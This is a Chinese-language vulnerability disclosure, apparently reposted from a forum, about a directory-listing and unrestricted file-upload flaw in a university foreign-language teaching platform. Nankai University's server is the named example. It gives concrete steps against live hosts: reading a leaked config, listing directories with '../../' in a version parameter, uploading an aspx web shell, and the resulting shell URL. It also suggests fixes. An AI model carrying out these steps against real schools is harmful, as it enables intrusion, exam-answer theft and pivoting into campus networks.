新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
4 }! {9 s& T5 M$ A4 D
5 [4 e6 r2 Z0 F+ c+ E详细说明：
" r/ G$ G/ }, U1 v6 A
以南开大学的为例:
. b+ n: L" B9 @4 S- }http://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
+ N. j8 T$ }& {% c  X<setting name="Update_CommonSvr_CommonService" serializeAs="String">
' J" K. u# R- q; A3 Y<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
及版本号
3 }3 n" [0 ^1 n( w+ i$ |, P<add key="TVersion" value="1, 0, 0, 2187">
</add>
6 I) w' h1 u. Z( \* Y直接访问
' ?5 g+ l8 V: r) ~  H1 ghttp://222.30.60.3/NPELS/CommonService.asmx
  g# @/ B7 n$ G% H. d, I使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
/ @% B8 S5 X+ D  P& i9 _进一步列目录（返回的网页很大，可以直接 wget 下来）
1 S% M/ Q: t- Nhttp://222.30.60.3/NPELS/CommonS ... List?version=../../

0 \* |4 p* }" I* [发现
/ s- y' `- w. lhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
: Y, f+ M' V- w. Z上传后继续列目录找到木马地址直接访问即可

OOXX
; B- u2 Q: R! K1 g  {( F, _
! J; E' ?! i7 H6 E& M- a* TGoogle "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
6 `- F( v6 }. z* w- D' t% k漏洞证明：

! w+ |& \4 m7 L- A9 x列目录：
3 b+ j. g2 m5 G  N9 x3 l4 Phttp://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
http://222.30.60.3/npelsv/editor/editor.htm

上传木马：
5 F' ~- `) G  j' k. r7 f5 _http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

  o2 k' q0 c3 V, C$ y5 j修复方案：
好像考试系统必须使用 CommonService.asmx
5 m3 b; t% L  F! }1 u最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
' b% x# D& m' C" R0 R7 |2 Y